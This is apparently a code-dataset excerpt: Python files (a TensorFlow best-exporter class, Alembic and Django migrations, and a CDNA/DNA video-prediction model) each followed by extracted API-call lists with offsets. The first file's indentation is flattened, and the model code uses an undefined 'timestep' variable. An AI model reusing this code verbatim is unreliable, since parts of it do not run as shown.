self._model_dir = None
self._best_eval_result = None
self._exports_to_keep = exports_to_keep
self._log = {}
if exports_to_keep is not None and exports_to_keep <= 0:
raise ValueError(
'`exports_to_keep`, if provided, must be positive number')
@property
def name(self):
return self._saved_model_exporter.name
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
export_result = None
if self._model_dir != estimator.model_dir and self._event_file_pattern:
# Loads best metric from event files.
tf_logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if os.path.isfile(os.path.join(export_path, 'export.log')):
self._log = {}
try:
self._log = json.load(open(os.path.join(export_path, 'export.log'), 'r'))
except json.JSONDecodeError:
pass
if len(self._log) == 0:
self._best_eval_result = None
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf_logging.info('Performing best model export.')
self._best_eval_result = eval_result
export_result = self._saved_model_exporter.export(
estimator, export_path, checkpoint_path, eval_result,
is_the_final_export)
export_result_path = export_result.decode("utf-8")
self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()}
self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"])
self._garbage_collect_exports(export_path)
with open(os.path.join(export_path, 'export.log'), 'w') as fp:
json.dump(self._log, fp)
return export_result
def _copy_checkpoint(self, checkpoint_pattern, dest_path, step):
for file in glob.glob(checkpoint_pattern + '*'):
shutil.copy(file, dest_path)
with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp:
text = 'model_checkpoint_path: "model.ckpt-number"\n'.replace('number', str(step))
fp.write(text)
fp.close()
def _garbage_collect_exports(self, export_dir_base):
"""Deletes older exports, retaining only a given number of the most recent.
Export subdirectories are assumed to be named with monotonically increasing
integers; the most recent are taken to be those with the largest values.
Args:
export_dir_base: the base directory under which each export is in a
versioned subdirectory.
"""
if self._exports_to_keep is None:
return
def _export_version_parser(path):
# create a simple parser that pulls the export_version from the directory.
filename = os.path.basename(path.path)
if not (len(filename) == 10 and filename.isdigit()):
return None
return path._replace(export_version=int(filename))
# pylint: disable=protected-access
keep_filter = gc._largest_export_versions(self._exports_to_keep)
delete_filter = gc._negation(keep_filter)
for p in delete_filter(
gc._get_paths(export_dir_base, parser=_export_version_parser)):
try:
del self._log[p.path]
gfile.DeleteRecursively(p.path)
except errors_impl.NotFoundError as e:
tf_logging.warn('Can not delete %s recursively: %s', p.path, e)
# pylint: enable=protected-access
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
event_count = 0
best_eval_result = None
for event_file in gfile.Glob(os.path.join(event_files)):
for event in summary_iterator.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
event_count += 1
best_eval_result = event_eval_result
if event_count < 2:
return None
return best_eval_result
| [
"tensorflow.python.estimator.gc._largest_export_versions",
"tensorflow.python.platform.gfile.DeleteRecursively",
"json.dump",
"os.path.join",
"tensorflow.python.summary.summary_iterator.summary_iterator",
"tensorflow.python.platform.tf_logging.warn",
"tensorflow.python.platform.tf_logging.info",
"tensorflow.python.estimator.gc._negation",
"shutil.copy",
"tensorflow.python.estimator.exporter._SavedModelExporter",
"os.path.basename",
"tensorflow.python.estimator.gc._get_paths",
"tensorflow.python.estimator.util.fn_args",
"glob.glob"
] | [((627, 651), 'tensorflow.python.estimator.util.fn_args', 'util.fn_args', (['compare_fn'], {}), '(compare_fn)\n', (639, 651), False, 'from tensorflow.python.estimator import util\n'), ((6454, 6529), 'tensorflow.python.estimator.exporter._SavedModelExporter', '_SavedModelExporter', (['name', 'serving_input_receiver_fn', 'assets_extra', 'as_text'], {}), '(name, serving_input_receiver_fn, assets_extra, as_text)\n', (6473, 6529), False, 'from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter\n'), ((8977, 9012), 'glob.glob', 'glob.glob', (["(checkpoint_pattern + '*')"], {}), "(checkpoint_pattern + '*')\n", (8986, 9012), False, 'import glob\n'), ((10180, 10230), 'tensorflow.python.estimator.gc._largest_export_versions', 'gc._largest_export_versions', (['self._exports_to_keep'], {}), '(self._exports_to_keep)\n', (10207, 10230), False, 'from tensorflow.python.estimator import gc\n'), ((10255, 10280), 'tensorflow.python.estimator.gc._negation', 'gc._negation', (['keep_filter'], {}), '(keep_filter)\n', (10267, 10280), False, 'from tensorflow.python.estimator import gc\n'), ((7276, 7332), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Loading best metric from event files."""'], {}), "('Loading best metric from event files.')\n", (7291, 7332), False, 'from tensorflow.python.platform import tf_logging\n'), ((7422, 7477), 'os.path.join', 'os.path.join', (['self._model_dir', 'self._event_file_pattern'], {}), '(self._model_dir, self._event_file_pattern)\n', (7434, 7477), False, 'import os\n'), ((7661, 7700), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7673, 7700), False, 'import os\n'), ((8164, 8212), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Performing best model export."""'], {}), "('Performing best model export.')\n", (8179, 8212), False, 'from tensorflow.python.platform import tf_logging\n'), ((9026, 9054), 'shutil.copy', 'shutil.copy', (['file', 'dest_path'], {}), '(file, dest_path)\n', (9037, 9054), False, 'import shutil\n'), ((9930, 9957), 'os.path.basename', 'os.path.basename', (['path.path'], {}), '(path.path)\n', (9946, 9957), False, 'import os\n'), ((10330, 10391), 'tensorflow.python.estimator.gc._get_paths', 'gc._get_paths', (['export_dir_base'], {'parser': '_export_version_parser'}), '(export_dir_base, parser=_export_version_parser)\n', (10343, 10391), False, 'from tensorflow.python.estimator import gc\n'), ((11051, 11076), 'os.path.join', 'os.path.join', (['event_files'], {}), '(event_files)\n', (11063, 11076), False, 'import os\n'), ((11104, 11149), 'tensorflow.python.summary.summary_iterator.summary_iterator', 'summary_iterator.summary_iterator', (['event_file'], {}), '(event_file)\n', (11137, 11149), False, 'from tensorflow.python.summary import summary_iterator\n'), ((8832, 8856), 'json.dump', 'json.dump', (['self._log', 'fp'], {}), '(self._log, fp)\n', (8841, 8856), False, 'import json\n'), ((9073, 9110), 'os.path.join', 'os.path.join', (['dest_path', '"""checkpoint"""'], {}), "(dest_path, 'checkpoint')\n", (9085, 9110), False, 'import os\n'), ((10465, 10496), 'tensorflow.python.platform.gfile.DeleteRecursively', 'gfile.DeleteRecursively', (['p.path'], {}), '(p.path)\n', (10488, 10496), False, 'from tensorflow.python.platform import gfile\n'), ((8763, 8802), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (8775, 8802), False, 'import os\n'), ((10564, 10627), 
'tensorflow.python.platform.tf_logging.warn', 'tf_logging.warn', (['"""Can not delete %s recursively: %s"""', 'p.path', 'e'], {}), "('Can not delete %s recursively: %s', p.path, e)\n", (10579, 10627), False, 'from tensorflow.python.platform import tf_logging\n'), ((7790, 7829), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7802, 7829), False, 'import os\n')] |
"""extend_ip_field
Revision ID: 8da20383f6e1
Revises: <KEY>
Create Date: 2021-01-14 10:50:56.275257
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "8da20383f6e1"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()[f"upgrade_{engine_name}"]()
def downgrade(engine_name):
globals()[f"downgrade_{engine_name}"]()
def upgrade_registrar():
pass
def downgrade_registrar():
pass
def upgrade_cloud_verifier():
with op.batch_alter_table("verifiermain") as batch_op:
batch_op.alter_column(
"ip", existing_type=sa.String(length=15), type_=sa.String(length=255), existing_nullable=True
)
def downgrade_cloud_verifier():
pass
| [
"sqlalchemy.String",
"alembic.op.batch_alter_table"
] | [((543, 579), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""verifiermain"""'], {}), "('verifiermain')\n", (563, 579), False, 'from alembic import op\n'), ((656, 676), 'sqlalchemy.String', 'sa.String', ([], {'length': '(15)'}), '(length=15)\n', (665, 676), True, 'import sqlalchemy as sa\n'), ((684, 705), 'sqlalchemy.String', 'sa.String', ([], {'length': '(255)'}), '(length=255)\n', (693, 705), True, 'import sqlalchemy as sa\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-07-10 20:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ucsrb', '0012_auto_20180710_1249'),
]
operations = [
migrations.AddField(
model_name='treatmentscenario',
name='landform_type',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes',
field=models.TextField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_east_west',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_floor',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_north',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_ridgetop',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_south',
field=models.BooleanField(default=True),
),
]
| [
"django.db.models.TextField",
"django.db.models.BooleanField"
] | [((415, 449), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (434, 449), False, 'from django.db import migrations, models\n'), ((598, 651), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (614, 651), False, 'from django.db import migrations, models\n'), ((818, 851), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (837, 851), False, 'from django.db import migrations, models\n'), ((1014, 1047), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1033, 1047), False, 'from django.db import migrations, models\n'), ((1210, 1243), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1229, 1243), False, 'from django.db import migrations, models\n'), ((1409, 1442), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1428, 1442), False, 'from django.db import migrations, models\n'), ((1605, 1638), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1624, 1638), False, 'from django.db import migrations, models\n')] |
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture for predictive model, including CDNA, DNA, and STP."""
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.platform import flags
from tensorflow.contrib.layers.python import layers as tf_layers
from lstm_ops import basic_conv_lstm_cell
FLAGS = flags.FLAGS
# Amount to use when lower bounding tensors
RELU_SHIFT = 1e-12
# kernel size for DNA and CDNA.
DNA_KERN_SIZE = 5
def kl_divergence(mu, log_sigma):
"""KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1).
Args:
mu: mu parameter of the distribution.
log_sigma: log(sigma) parameter of the distribution.
Returns:
the KL loss.
"""
return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma),
axis=1)
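# Note on kl_divergence above (assuming log_sigma holds the log-variance): it
# computes the closed form
#   KL(N(mu, exp(log_sigma)) || N(0, 1)) = -0.5 * sum(1 + log_sigma - mu^2 - exp(log_sigma))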
def construct_latent_tower(images):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
Returns:
latent_mean: predicted latent mean
latent_std: predicted latent standard deviation
    latent_loss: loss of the latent tower
samples: random samples sampled from standard guassian
"""
with slim.arg_scope([slim.conv2d], reuse=False):
stacked_images = tf.concat(images, 3)
latent_enc1 = slim.conv2d(
stacked_images,
32, [3, 3],
stride=2,
scope='latent_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm1'})
latent_enc2 = slim.conv2d(
latent_enc1,
64, [3, 3],
stride=2,
scope='latent_conv2',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm2'})
latent_enc3 = slim.conv2d(
latent_enc2,
64, [3, 3],
stride=1,
scope='latent_conv3',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm3'})
latent_mean = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
activation_fn=None,
scope='latent_mean',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm_mean'})
latent_std = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
scope='latent_std',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_std_norm'})
latent_std += FLAGS.latent_std_min
divergence = kl_divergence(latent_mean, latent_std)
latent_loss = tf.reduce_mean(divergence)
if FLAGS.multi_latent:
# timestep x batch_size x latent_size
samples = tf.random_normal(
[FLAGS.sequence_length-1] + latent_mean.shape, 0, 1,
dtype=tf.float32)
else:
# batch_size x latent_size
samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32)
if FLAGS.inference_time:
# No latent tower at inference time, just standard gaussian.
return None, None, None, samples
else:
return latent_mean, latent_std, latent_loss, samples
def construct_model(images,
actions=None,
states=None,
iter_num=-1.0,
k=-1,
use_state=True,
num_masks=10,
stp=False,
cdna=True,
dna=False,
context_frames=2):
"""Build convolutional lstm video predictor using STP, CDNA, or DNA.
Args:
images: tensor of ground truth image sequences
actions: tensor of action sequences
states: tensor of ground truth state sequences
iter_num: tensor of the current training iteration (for sched. sampling)
k: constant used for scheduled sampling. -1 to feed in own prediction.
use_state: True to include state and action in prediction
num_masks: the number of different pixel motion predictions (and
the number of masks for each of those predictions)
stp: True to use Spatial Transformer Predictor (STP)
    cdna: True to use Convolutional Dynamic Neural Advection (CDNA)
dna: True to use Dynamic Neural Advection (DNA)
context_frames: number of ground truth frames to pass in before
feeding in own predictions
Returns:
gen_images: predicted future image frames
gen_states: predicted future states
Raises:
ValueError: if more than one network option specified or more than 1 mask
specified for DNA model.
"""
# Each image is being used twice, in latent tower and main tower.
# This is to make sure we are using the *same* image for both, ...
# ... given how TF queues work.
images = [tf.identity(image) for image in images]
if stp + cdna + dna != 1:
raise ValueError('More than one, or no network option specified.')
batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4]
lstm_func = basic_conv_lstm_cell
# Generated robot states and images.
gen_states, gen_images = [], []
current_state = states[0]
if k == -1:
feedself = True
else:
# Scheduled sampling:
# Calculate number of ground-truth frames to pass in.
num_ground_truth = tf.to_int32(
tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k)))))
feedself = False
# LSTM state sizes and states.
lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32]))
lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None
lstm_state5, lstm_state6, lstm_state7 = None, None, None
# Latent tower
latent_loss = 0.0
if FLAGS.stochastic_model:
latent_tower_outputs = construct_latent_tower(images)
latent_mean, latent_std, latent_loss, samples = latent_tower_outputs
# Main tower
for image, action in zip(images[:-1], actions[:-1]):
# Reuse variables after the first timestep.
reuse = bool(gen_images)
done_warm_start = len(gen_images) > context_frames - 1
with slim.arg_scope(
[lstm_func, slim.layers.conv2d, slim.layers.fully_connected,
tf_layers.layer_norm, slim.layers.conv2d_transpose],
reuse=reuse):
if feedself and done_warm_start:
# Feed in generated image.
prev_image = gen_images[-1]
elif done_warm_start:
# Scheduled sampling
prev_image = scheduled_sample(image, gen_images[-1], batch_size,
num_ground_truth)
else:
# Always feed in ground_truth
prev_image = image
# Predicted state is always fed back in
state_action = tf.concat(axis=1, values=[action, current_state])
enc0 = slim.layers.conv2d(
prev_image,
32, [5, 5],
stride=2,
scope='scale1_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm1'})
hidden1, lstm_state1 = lstm_func(
enc0, lstm_state1, lstm_size[0], scope='state1')
hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2')
hidden2, lstm_state2 = lstm_func(
hidden1, lstm_state2, lstm_size[1], scope='state2')
hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3')
enc1 = slim.layers.conv2d(
hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2')
hidden3, lstm_state3 = lstm_func(
enc1, lstm_state3, lstm_size[2], scope='state3')
hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4')
hidden4, lstm_state4 = lstm_func(
hidden3, lstm_state4, lstm_size[3], scope='state4')
hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5')
enc2 = slim.layers.conv2d(
hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3')
# Pass in state and action.
smear = tf.reshape(
state_action,
[int(batch_size), 1, 1, int(state_action.get_shape()[1])])
smear = tf.tile(
smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1])
if use_state:
enc2 = tf.concat(axis=3, values=[enc2, smear])
# Setup latent
if FLAGS.stochastic_model:
latent = samples
if FLAGS.multi_latent:
latent = samples[timestep]
if not FLAGS.inference_time:
latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage,
lambda: tf.identity(latent),
lambda: latent_mean + tf.exp(latent_std / 2.0) * latent)
with tf.control_dependencies([latent]):
enc2 = tf.concat([enc2, latent], 3)
enc3 = slim.layers.conv2d(
enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4')
hidden5, lstm_state5 = lstm_func(
enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8
hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6')
enc4 = slim.layers.conv2d_transpose(
hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1')
hidden6, lstm_state6 = lstm_func(
enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16
hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7')
# Skip connection.
hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16
enc5 = slim.layers.conv2d_transpose(
hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2')
hidden7, lstm_state7 = lstm_func(
enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32
hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8')
# Skip connection.
hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32
enc6 = slim.layers.conv2d_transpose(
hidden7,
hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None,
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm9'})
if dna:
# Using largest hidden state for predicting untied conv kernels.
enc7 = slim.layers.conv2d_transpose(
enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None)
else:
# Using largest hidden state for predicting a new image layer.
enc7 = slim.layers.conv2d_transpose(
enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None)
# This allows the network to also generate one image from scratch,
# which is useful when regions of the image become unoccluded.
transformed = [tf.nn.sigmoid(enc7)]
if stp:
stp_input0 = tf.reshape(hidden5, [int(batch_size), -1])
stp_input1 = slim.layers.fully_connected(
stp_input0, 100, scope='fc_stp')
transformed += stp_transformation(prev_image, stp_input1, num_masks)
elif cdna:
cdna_input = tf.reshape(hidden5, [int(batch_size), -1])
transformed += cdna_transformation(prev_image, cdna_input, num_masks,
int(color_channels))
elif dna:
# Only one mask is supported (more should be unnecessary).
if num_masks != 1:
raise ValueError('Only one mask is supported for DNA model.')
transformed = [dna_transformation(prev_image, enc7)]
masks = slim.layers.conv2d_transpose(
enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None)
masks = tf.reshape(
tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])),
[int(batch_size), int(img_height), int(img_width), num_masks + 1])
mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks)
output = mask_list[0] * prev_image
for layer, mask in zip(transformed, mask_list[1:]):
output += layer * mask
gen_images.append(output)
current_state = slim.layers.fully_connected(
state_action,
int(current_state.get_shape()[1]),
scope='state_pred',
activation_fn=None)
gen_states.append(current_state)
return gen_images, gen_states, latent_loss
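# Illustrative call sketch (assumptions: placeholder batch size and tensor
# shapes; not part of the original file):
#   images  = [tf.zeros([8, 64, 64, 3])] * FLAGS.sequence_length
#   actions = [tf.zeros([8, 4])] * FLAGS.sequence_length
#   states  = [tf.zeros([8, 3])] * FLAGS.sequence_length
#   gen_images, gen_states, latent_loss = construct_model(
#       images, actions, states, iter_num=tf.constant(0.0), k=900)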
## Utility functions
def stp_transformation(prev_image, stp_input, num_masks):
"""Apply spatial transformer predictor (STP) to previous image.
Args:
prev_image: previous image to be transformed.
stp_input: hidden layer to be used for computing STN parameters.
num_masks: number of masks and hence the number of STP transformations.
Returns:
List of images transformed by the predicted STP parameters.
"""
# Only import spatial transformer if needed.
from spatial_transformer import transformer
identity_params = tf.convert_to_tensor(
np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32))
transformed = []
for i in range(num_masks - 1):
params = slim.layers.fully_connected(
stp_input, 6, scope='stp_params' + str(i),
activation_fn=None) + identity_params
transformed.append(transformer(prev_image, params))
return transformed
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
    cdna_input: hidden layer to be used for computing CDNA kernels.
num_masks: the number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = int(cdna_input.get_shape()[0])
height = int(prev_image.get_shape()[1])
width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = slim.layers.fully_connected(
cdna_input,
DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks,
scope='cdna_params',
activation_fn=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks])
cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')
# Transpose the dimensions to where they belong.
transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def dna_transformation(prev_image, dna_input):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
    dna_input: hidden layer to be used for computing DNA transformation.
Returns:
    Image transformed by the predicted DNA kernels.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(DNA_KERN_SIZE):
for ykern in range(DNA_KERN_SIZE):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT
kernel = tf.expand_dims(
kernel / tf.reduce_sum(
kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth):
"""Sample batch with specified mix of ground truth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
num_ground_truth: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
idx = tf.random_shuffle(tf.range(int(batch_size)))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size)))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
return tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
| [
"tensorflow.unstack",
"tensorflow.pad",
"tensorflow.transpose",
"tensorflow.contrib.slim.arg_scope",
"spatial_transformer.transformer",
"tensorflow.reduce_sum",
"tensorflow.split",
"numpy.array",
"tensorflow.control_dependencies",
"tensorflow.contrib.slim.layers.conv2d",
"tensorflow.reduce_mean",
"tensorflow.slice",
"tensorflow.nn.depthwise_conv2d",
"tensorflow.random_normal",
"tensorflow.dynamic_stitch",
"tensorflow.concat",
"tensorflow.nn.sigmoid",
"tensorflow.square",
"tensorflow.range",
"tensorflow.gather",
"tensorflow.reshape",
"tensorflow.contrib.slim.layers.conv2d_transpose",
"tensorflow.contrib.slim.layers.fully_connected",
"tensorflow.nn.relu",
"tensorflow.to_float",
"tensorflow.exp",
"tensorflow.identity",
"tensorflow.contrib.layers.python.layers.layer_norm",
"tensorflow.contrib.slim.conv2d"
] | [((14752, 14879), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['cdna_input', '(DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks)'], {'scope': '"""cdna_params"""', 'activation_fn': 'None'}), "(cdna_input, DNA_KERN_SIZE * DNA_KERN_SIZE *\n num_masks, scope='cdna_params', activation_fn=None)\n", (14779, 14879), True, 'import tensorflow.contrib.slim as slim\n'), ((14944, 15029), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]'], {}), '(cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]\n )\n', (14954, 15029), True, 'import tensorflow as tf\n'), ((15112, 15164), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['cdna_kerns', '[1, 2, 3]'], {'keep_dims': '(True)'}), '(cdna_kerns, [1, 2, 3], keep_dims=True)\n', (15125, 15164), True, 'import tensorflow as tf\n'), ((15475, 15516), 'tensorflow.transpose', 'tf.transpose', (['cdna_kerns', '[1, 2, 0, 4, 3]'], {}), '(cdna_kerns, [1, 2, 0, 4, 3])\n', (15487, 15516), True, 'import tensorflow as tf\n'), ((15532, 15609), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks]'], {}), '(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])\n', (15542, 15609), True, 'import tensorflow as tf\n'), ((15668, 15706), 'tensorflow.transpose', 'tf.transpose', (['prev_image', '[3, 1, 2, 0]'], {}), '(prev_image, [3, 1, 2, 0])\n', (15680, 15706), True, 'import tensorflow as tf\n'), ((15745, 15813), 'tensorflow.nn.depthwise_conv2d', 'tf.nn.depthwise_conv2d', (['prev_image', 'cdna_kerns', '[1, 1, 1, 1]', '"""SAME"""'], {}), "(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')\n", (15767, 15813), True, 'import tensorflow as tf\n'), ((15882, 15961), 'tensorflow.reshape', 'tf.reshape', (['transformed', '[color_channels, height, width, batch_size, num_masks]'], {}), '(transformed, [color_channels, height, width, batch_size, num_masks])\n', (15892, 15961), True, 'import tensorflow as tf\n'), ((15978, 16020), 'tensorflow.transpose', 'tf.transpose', (['transformed', '[3, 1, 2, 0, 4]'], {}), '(transformed, [3, 1, 2, 0, 4])\n', (15990, 16020), True, 'import tensorflow as tf\n'), ((16037, 16069), 'tensorflow.unstack', 'tf.unstack', (['transformed'], {'axis': '(-1)'}), '(transformed, axis=-1)\n', (16047, 16069), True, 'import tensorflow as tf\n'), ((16458, 16510), 'tensorflow.pad', 'tf.pad', (['prev_image', '[[0, 0], [2, 2], [2, 2], [0, 0]]'], {}), '(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])\n', (16464, 16510), True, 'import tensorflow as tf\n'), ((16883, 16915), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': 'inputs'}), '(axis=3, values=inputs)\n', (16892, 16915), True, 'import tensorflow as tf\n'), ((17116, 17168), 'tensorflow.reduce_sum', 